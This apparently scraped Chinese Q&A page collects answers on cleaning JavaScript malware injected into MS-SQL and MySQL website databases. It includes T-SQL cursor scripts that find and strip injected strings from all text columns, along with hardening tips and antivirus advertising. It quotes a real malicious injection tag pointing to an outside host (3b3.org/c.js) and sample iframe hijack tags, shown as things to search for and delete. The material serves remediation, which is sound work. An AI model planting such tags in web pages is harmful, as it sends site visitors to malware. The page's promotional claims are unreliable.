sql数据库掉线木马_求助：网站中了木马sql数据库被注入代码我改怎么办

① 电脑中了木马(sql)

您好

这应该是您的电脑中存在远程木马

您可以先到腾讯电脑管家官网下载电脑管家

然后使用电脑管家——杀毒——全盘查杀，电脑管家拥有基于CPU虚拟执行技术，可以帮您策划第根除电脑中的木马病毒

杀毒完成后，重启电脑，再去删除掉开机其他帐户即可。

如果还有其他疑问和问题，欢迎再次来电脑管家企业平台进行提问，我们将尽全力为您解答疑难

② 请教：sql数据库被挂马如何查找替换

说明是什么数据库，如果是MS-SQL 可参照我的代码declare @rs varchar(32),@sql varchar(1000)
set @rs ='IT2100' ---木马的代码
declare c1 cursor for
select 'if exists(select 1 from '+b.name+' where '+a.name+' like ''%'+@rs+'%'') print '''+b.name+'---'+a.name+''''
from sys.columns a left join sys.tables b
on a.object_id=b.object_id
where b.type='U' AND a.system_type_id in(167,175,231,239)
open c1
fetch next from c1 into @sql
while @@fetch_status=0
begin
exec(@sql)
fetch next from c1 into @sql
end
close c1
deallocate c1将上面的print后面的换成相应的替换代码

③ 求助：网站中了木马，sql数据库被注入代码，我改怎么办

④ ecshop商城MySQL数据库被挂马了，无法清除木马

一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了
网站挂马是每个网站最头痛的问题，解决办法：1.在程序中很容易找到挂马的代码，直接删除，或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉
听朋友说 SineSafe 不错你可以去看看。

清马+修补漏洞=彻底解决

所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day, 等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库备份/恢复或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP，然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒

清马

1、找挂马的标签，比如有<script language="javascript" src="网马地址"></script>或<iframe width=420 height=330 frameborder=0
scrolling=auto src=网马地址></iframe>，或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马，一般是JS挂马。

2、找到了恶意代码后，接下来就是清马，如果是网页被挂马，可以用手动清，也可以用批量清，网页清马比较简单，这里就不详细讲，现在着重讲一下SQL数据库清马，用这一句语句“update 表名 set 字段名=replace(字段名,'aaa','')”，解释一下这一句子的意思：把字段名里的内容包含aaa的替换成空，这样子就可以一个表一个表的批量删除网马。

在你的网站程序或数据库没有备份情况下，可以实行以上两步骤进行清马，如果你的网站程序有备份的话，直接覆盖原来的文件即可。

修补漏洞（修补网站漏洞也就是做一下网站安全。）

1、修改网站后台的用户名和密码及后台的默认路径。

2、更改数据库名,如果是ACCESS数据库，那文件的扩展名最好不要用mdb，改成ASP的，文件名也可以多几个特殊符号。

3、接着检查一下网站有没有注入漏洞或跨站漏洞，如果有的话就相当打上防注入或防跨站补丁。

4、检查一下网站的上传文件，常见了有欺骗上传漏洞，就对相应的代码进行过滤。

5、尽可能不要暴露网站的后台地址，以免被社会工程学猜解出管理用户和密码。

6、写入一些防挂马代码，让框架代码等挂马无效。

7、禁用FSO权限也是一种比较绝的方法。

8、修改网站部分文件夹的读写权限。

9、如果你是自己的服务器，那就不仅要对你的网站程序做一下安全了，而且要对你的服务器做一下安全也是很有必要了！

⑤ 远程连接Sql server数据库为什么360会报发现木马

可能是360的误报吧，不确定的文件它可能就会报的！！建议使用腾讯电脑管家，全面的查杀！！
依托小红伞(antivir)国际顶级杀毒引擎、腾讯云引擎，鹰眼引擎等四核专业引擎查杀能力，病毒识别率提高30%，深度根除顽固病毒！全方位保障用户上网安全。
管家云引擎、管家自研引擎、金山云引擎、Avira引擎，以及管家系统修复引擎，完美解决杀毒修复问题！！
工具箱---顽固木马克星---强力查杀

希望可以帮到您了

⑥ 局域网连接SQL数据库经常掉线是什么原因

1 查看数据库连接设置的最大连接数通常设置越大越好

2. 查看下网络环境是否稳定

3. 还要查看是否是数据库服务器的网线接触不好

⑦ 网站数据库(SQL)被注入js木马，不知道怎么防

清除：可以用DW批量查找<script language=javascript src=一个网址></script>然后删除或者使用Macfee 或网站被挂马批量清除工具来清除木马。

在清理完木马以后，尽量查找出是哪里出了问题，导致被挂马有如下i个原因：1：网站自身安全漏洞，在程序上存在安全问题比如SQL注入或者upfile上传漏洞等所以只要查找出问题所在这就很容易去修复了，如果你使用网上提供的开源的程序,那我想也会有针对漏洞的补丁。再或者你修复不明白的话就删除或者禁用这个文件。
2：如果你使用的是虚拟主机的话可能是受同服务器下其他网站影响

3：如果你是单独服务器在自身网站没问题的情况下，可能是ARP

⑧ SQL数据库中木马

⑨ SQL SERVER2000数据库，提示有木马攻击

你好，sql server 2005 的攻击方法:弱口令攻击、SQL注入攻击

SQL Server可以从Internet上访问并下载和安装软件。这些以及其它那些我们每天经常做的事情可能会为特洛伊木马提供安装的途径。看起来很奇怪，但是就服务器而言，感染上病毒是很容易的——特别是没有用保护终端用户系统那样的方式来保护它的时候。

当发现数据库服务器发生了奇怪的现象，先运行如下的测试，看看是否感染了特洛伊病毒。

1:使用恶意软件扫描器

有的数据库服务器因为怕性能下降或者系统崩溃而不采取，或者采取有限的恶意软件防范措施。很如果没有安装反病毒软件，就尽快安装一个杀毒软件。如果需要实时保护的资源太多了，那么就要将数据库和其它高活动性的目录排除在实时扫描的外面吧。否则，最低限度，也要安装反病毒软件，然后每隔几天，找个非高峰的时间来扫描本地磁盘。

如果已经运行了反病毒软件，那么确保它是最新的（那些基于客户端的自动更新和网络管理签名并不是百分百的可靠），并且执行一次全面的系统扫描。

2: 查看内存

可以使用Windows任务管理器来搜索那些看起来就属于恶意软件，或者使用了太多内存或者占用了大量CPU时间的应用程序。建议使用Sysinternals公司的Process Explorer（下面高亮显示的NetBus Trojan），因为它提供了运行进程的较多信息，并且以更可靠的方式来杀掉那些不应该的进程。

在网络中的所有系统中，确实需要彻底地了解数据库——其中包括记录哪些进程应该运行，哪些不应该。所以，如果在第一次安装之后拥有了良好的基线——甚至是现在，假设所有事物都运行得很好——当发生特洛伊类型的问题的时候，就可以用它作为比较的基础。

3: 查看开放的端口

可以使用Windows内置的netstat工具来查看哪些端口开放的，并且连接到服务器上。在命令行中，输入netstat –anmore，可以一页挨着一页地查看开放的和监听的TCP和UDP端口。还有一种更好的方法就是使用Foundstone的 Vision工具或者Sysinternals公司的TCPView工具来完成。

4: 查看网络流量

也许判断SQL Server中是否发生了恶意行为的最简单办法就是看看它是否进行了网络通信。如果有一个非常顺手的网络分析器，那么就可以在1、2分钟之内发现情况。可以使用SQL Server自身携带的分析器，或者从别处连接到以太网交换器的交换或者镜像端口上。

EtherPeek可以轻松抓取网络流量，并且高亮显示特洛伊的动作——在本次网络流量抓取过程中可以真正地创建网络分析触发器和过滤器，如果知道要寻找什么的话。这里的列表列出了常见的特洛伊和相关端口的细腻向。这种发现恶意流量的方法并不是十分安全，因为端口号是可以经常更换的，但是它的服务器是个不错的目标。

可以在“监控”模式下运行Ether Peek，让它对网络上发生的事情有个从上到下的整体视角，——而不需要抓取包。可以查看正在使用哪个协议，寻找巨大的流量，奇怪的通信，以及其它网络进出SQL Server系统的倾向。

5:对付恶意软件的方法

特洛伊木马是计算机上的一个令人厌恶的创造——它创建远程访问隧道，截获按键，删除数据等更多事情——特别是在最重要的服务器上。很明显，最好的办法就是不用SQL Server进行Internet访问，Web浏览，电子邮件等行为。——但是，这不现实。（或者其他人）可能会需要它最终不仅仅作为一个数据库服务器。一旦这样的事情出现了，就需要确保是被保护的。不要把责任推卸给其他人，或者其他任何东西，特洛伊不是运行在他们的系统上。不论以何种方式，永远不要假设反病毒软件可以保证万无一失。

分析并解决恶意软件的方法：如果想要攻击，或者安装一个可以在网络上给帮助的欺诈软件，那么没有什么地方比直接在SQL Server上更好了。服务器上可能还没有特洛伊，但是如果感觉到有问题，那么兇手就可以很容易发现。
腾讯电脑管家企业平台：http://..com/c/guanjia/

⑩ MSSQL数据库被插入木马如何用SQL语句批量删除

如何最快速度删除？
" <script src= http://3b3.org/c.js> </script> "
---------------------------------------------------------------
进入SQL查询分析器
选择你的数据库
第一步：先sql表修改所有者为dbo
EXEC sp_MSforeachtable 'exec sp_changeobjectowner ' '? ' ', ' 'dbo ' ' '

第二步：统一删除字段被挂的js
declare @delStr nvarchar(500)
set @delStr= ' <script src= http://3b3.org/c.js> </script> '

set nocount on

declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)

set @iResult=0
declare cur cursor for
select name,id from sysobjects where xtype= 'U '

open cur
fetch next from cur into @tableName,@tbID

while @@fetch_status=0
begin
declare cur1 cursor for
--xtype in (231,167,239,175,35) 为char,varchar,nchar,nvarchar,text类型
select name from syscolumns where xtype in (231,167,239,175,35) and id=@tbID
open cur1
fetch next from cur1 into @columnName
while @@fetch_status=0
begin
set @sql= 'update [ ' + @tableName + '] set [ '+ @columnName + ']= replace([ '+@columnName+ '], ' ' '+@delStr+ ' ' ', ' ' ' ') where [ '+@columnName+ '] like ' '% '+@delStr+ '% ' ' '
exec sp_executesql @sql
set @iRow=@@rowcount
set @iResult=@iResult+@iRow
if @iRow> 0
begin
print '表： '+@tableName+ ',列: '+@columnName+ '被更新 '+convert(varchar(10),@iRow)+ '条记录; '
end
fetch next from cur1 into @columnName

end
close cur1
deallocate cur1

fetch next from cur into @tableName,@tbID
end
print '数据库共有 '+convert(varchar(10),@iResult)+ '条记录被更新!!! '

close cur
deallocate cur
set nocount off
---------------------------------------------------------------
彻底杜绝SQL注入

1.不要使用sa用户连接数据库
2、新建一个public权限数据库用户，并用这个用户访问数据库
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限
4、[用户]用户名称-> 右键－属性－权限－在sysobjects与syscolumns上面打“×”
5、通过以下代码检测（失败表示权限正确，如能显示出来则表明权限太高）：
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
---------------------------------------------------------------
让3b3.org c.js注入见鬼去吧！

sql数据库掉线木马

与sql数据库掉线木马相关的内容